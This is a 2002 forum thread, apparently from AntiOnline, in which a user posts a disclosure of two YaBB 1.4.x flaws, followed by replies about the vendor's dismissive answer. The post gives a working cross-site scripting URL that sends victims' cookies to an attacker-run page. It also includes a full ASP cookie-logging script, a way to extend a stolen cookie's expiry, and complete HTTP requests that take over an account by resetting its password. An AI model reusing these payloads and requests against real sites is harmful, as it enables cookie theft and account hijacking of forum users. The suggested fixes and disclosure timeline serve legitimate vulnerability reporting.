The New YaBB Vulnerability!!!!
Results 1 to 6 of 6

Thread: The New YaBB Vulnerability!!!!

  1. #1
    Member
    Join Date
    May 2002
    Posts
    40

    The New YaBB Vulnerability!!!!

    OK Antionline, As i said earlier about finding security issues, me and my friend found 2 security Issues in YaBB Forums, and here they are (This text we wrote is really fresh on the net) (P.S, voting will help me, thanks) :


    Two security vulnerabilities in YaBB allows stealing users cookies and hijacking users accounts.

    Tested on:
    YaBB 1.4.0 & 1.4.1

    Summary :
    YaBB is a leading provider of free, downloadable php forums for webmasters. Two security vulnerabilities in the product allows a remote attacker to steal users cookies, hijacking users accounts, and more. The issues discussed are :
    1. Cross Site Scripting Vulnerability on the login procedure.
    2. Unsecured changing profile method.

    *************** 1. Cross Site Scripting Vulnerability on the login procedure ******************

    If we log into YaBB forums and enter invalid username/password, the forum displays the username and the password we entered, and it doesn't strip HTML tags from the password field, allowing us to write malicious HTML and JavaScript into the page. From now on, stealing the username cookie is pretty easy. The method for this is creating a css vulnerability in the target site, forcing him to send the cookie to an .asp file we have created. This can be done by this statement :
    http://target.com/forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>window.location.href(%22http://www.oursite.com/hack.asp?%22%2Bdocument.cookie)</script>

    Sending the above url to someone can be suspicious to him but we can build a site which have a invisible frame to that url, which is alot more dangerous.

    NOTE : the yabb doesnt allow us to use "=" or "%3d", so we have to catch the cookie without a request("data") statement in the asp file, because then we will need to put "data=" in the url.

    Ok, now lets build the hack.asp file, to log the cookie we are posting. The file should look like this :
    ------------------------------- hack.asp ------------------------------------
    <%
    Option Explicit

    Const ForWriting = 2
    Const ForAppending = 8
    Const Create = True

    Dim MyFile
    Dim FSO ' FileSystemObject
    Dim TSO ' TextStreamObject
    Dim Str
    Str = Request.ServerVariables("QUERY_STRING")

    MyFile = Server.MapPath("./db/log.txt")

    Set FSO = Server.CreateObject("Scripting.FileSystemObject")
    Set TSO = FSO.OpenTextFile(MyFile, ForAppending, Create)

    if (Str <> "") then TSO.WriteLine Str

    TSO.close
    Set TSO = Nothing
    Set FSO = Nothing
    %>
    <HTML>
    <BODY>
    You have just been hacked.
    </BODY>
    </HTML>
    ----------------------------------- EOF -----------------------------------

    This file writes Request.ServerVariables("QUERY_STRING"), which is the whole path we are posting after the "?", into a log file.


    ************* 2. Unsecured changing profile method ***************

    YaBB has a form to change users details. the original password is not required when changing the password to a new one, meaning that if an attacker have someone else cookie, he can change his password.

    - Defines:
    USERNAME - The username
    USERNAME COOKIE- The username cookie.

    - YaBB Cookie Explanation :
    The cookie's format of YaBB is something like :
    Cookie: YaBBusername=<USERNAME>; YaBBpassword=ys6bPWmp44PXA;
    expiretime=1034304354
    After the attacker got the cookie, he can use the cookie to change the user password. He can use the cookie even if the expiretime has passed by changing the cookie to the following :
    Cookie: YaBBusername=<USERNAME; YaBBpassword=ys6bPWmp44PXA;
    expiretime=9999999999

    This one will always work.

    - Exploiting the server and changing to a new password :
    First of all, if the attacker only want to change the password and not the user details, he will have to get them from the server database and only then he will build his POST request that will change the user's password. to do that, he also have to include the stolen cookie.

    to find out the user details, he will send this request to the server :

    ------------------------------------
    GET /forums/index.php?board=;action=profile;user=<USERNAME> HTTP/1.0
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
    application/vnd.ms-powerpoint, application/vnd.ms-excel,
    application/msword,
    */*
    Accept-Language: en-us
    Cookie: <USERNAME COOKIE>
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
    Host: www.victim.com
    Proxy-Connection: Keep-Alive
    ------------------------------------

    Then the server will return a form with the <USERNAME> details, and allow attacker to change it. Note that the form doesn't ask the user to enter his previous password, and it doesn't check anything but the username and his cookie to see if it is the legitimate user. Now attacker is ready to build his main POST request to change the user's password

    The POST request might look like this :

    ------------------------------------
    POST /forums/index.php?board=;action=profile2 HTTP/1.1
    Accept: application/vnd.ms-powerpoint, application/vnd.ms-excel,
    application/msword, image/gif, image/x-xbitmap, image/jpeg,
    image/pjpeg, */*
    Accept-Language: en-us
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;
    TUCOWS;
    YComp 5.0.0.0)
    Host: www.victim.com
    Content-Length: 286
    Proxy-Connection: Keep-Alive
    Pragma: no-cache
    Cookie: <USERNAME COOKIE>

    userID=666&user=<USERNAME>&passwrd1=HaCkEd&passwrd2=HaCkEd&name=<USERNAME>&e
    mail=victim@hotmail.com&gender=&bday1=00&bday2=00&bday3=0000&location=&websi
    tetitle=&websiteurl=&icq=3&aim=&msn=&yim=&usertext=&hideemail=on&usertimefor
    mat=&usertimeoffset=0&signature=&secretQuestion=&secretAnswer=&moda=1
    ------------------------------------

    All the details that the attacker set are values taken from the form he got when he sent the GET request first (note that userID is a hidden value).
    You can see the "passwrd1" and "passwrd2" parameters that attacker send to the server.
    After sending the above POST request, the user's password will be changed to "HaCkEd".

    *************************************************************************

    - Possible Solution:
    For the CSS Problem : Dont show the invalid username/password, or at least strip HTML tags from the password field

    For the password changing problem :
    1. YaBB can save the IP of each user, and check the IP when someone asks to change his password. (Still not unbreakable, but much harder to exploit).
    2. YaBB can ask the user to enter also the previous password before changing it to new one. In that way the attacker won't be able to break the forum protection by having only the user's cookie.

    -
    The security vulnerabilities were found by:

    Assaf Reshef
    Email: assaf@fullscreen.co.il

    Nir Adar
    Email: niradar@yahoo.com
    Web: http://underwar.livedns.co.il

    *************************************************************************

    Vendor status :
    10.10 First contact with the vendor, about the first security issue.
    11.10-16.10 Talking with the vendor. Vendor didnt take this seriously
    18.10 Second contact about the second security issue
    18.10 Vendor didnt take this issue seriously either

  2. #2
    Banned
    Join Date
    Oct 2002
    Posts
    9
    Excellent thread STeRoiD good finding.

  3. #3
    Senior Member
    Join Date
    Jul 2002
    Posts
    154
    Nice find. Just wondering about a couple of things.
    1. Why did you use asp? Something special? Or just a language you know?
    2. What did YaBB say to you exactly? Did they just refuse to acknowledge the problem or what? Seems like a big problem, anybody with win9x or xp pro, 2k, and nt could run asp pages. I dunno about xp home.
    3. Do you guys have a background in security or something? Or were you just very bored? I've been studying phph portals, and found a few problems, but nothing as complicated as this.

  4. #4
    Junior Member
    Join Date
    Oct 2002
    Posts
    3

    Answers

    Answers:

    > 1. Why did you use asp? Something special? Or just a language you know?

    Just language we know...

    >2. What did YaBB say to you exactly? Did they just refuse to acknowledge the problem or
    > what? Seems like a big problem, anybody with win9x or xp pro, 2k, and nt could run asp
    > pages. I dunno about xp home.

    examples to some of the YaBB's replies:

    ------------------------------------------------------------------------------------------
    Well we're looking into it but we're not so sure what we're going to do
    with it. Basically this issue equates to: If someone steals my key for my
    house, it means there is a security hole. And really that ISN'T a security
    hole.
    ------------------------------------------------------------------------------------------
    If you guys can grab control of my user account on the main forums,
    I'll take this seriously. Take control of my account (username is *****) and
    post a message in the admin area, I will take a hard look at these...
    The developers weren't at all convinced that the first thing was a
    security hole and I'm not so sure this next one is either.
    ------------------------------------------------------------------------------------------


    > 3. Do you guys have a background in security or something? Or were you just very bored?
    > I've been studying phph portals, and found a few problems, but nothing as complicated as
    > this.

    We are programmers. Founding the bugs was easy - anyone can see that they don't ask for the previous password before changing it to new one. Also - it is easy to find the Css bug.
    simply type something like "whatever" in every text input you find, and test if it strips the tag or not.
    Exploiting the bugs - it is programming.


    Nir

  5. #5
    Senior Member
    Join Date
    Jul 2002
    Posts
    154
    If you guys can grab control of my user account on the main forums,
    I'll take this seriously. Take control of my account (username is *****) and
    post a message in the admin area, I will take a hard look at these...
    That's foolish, lots of people can be socially engineered. To ignore the situation, well, it shows they aren't all that comitted to the security of their product. They shouldn't hope that every user who uses YaBB knows better. Ignoring a flaw only proves that YaBB isn't the way to go if you're looking for a forum.
    Anyways, thanks for the post.

  6. #6
    Senior Member
    Join Date
    Apr 2002
    Posts
    634
    Good thread STeRoiD. One of my friends use Yabb on his site. He will become mad to have to change one of its components again (the last month it was the web server which was cracked).
    Life is boring. Play NetHack... --more--

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •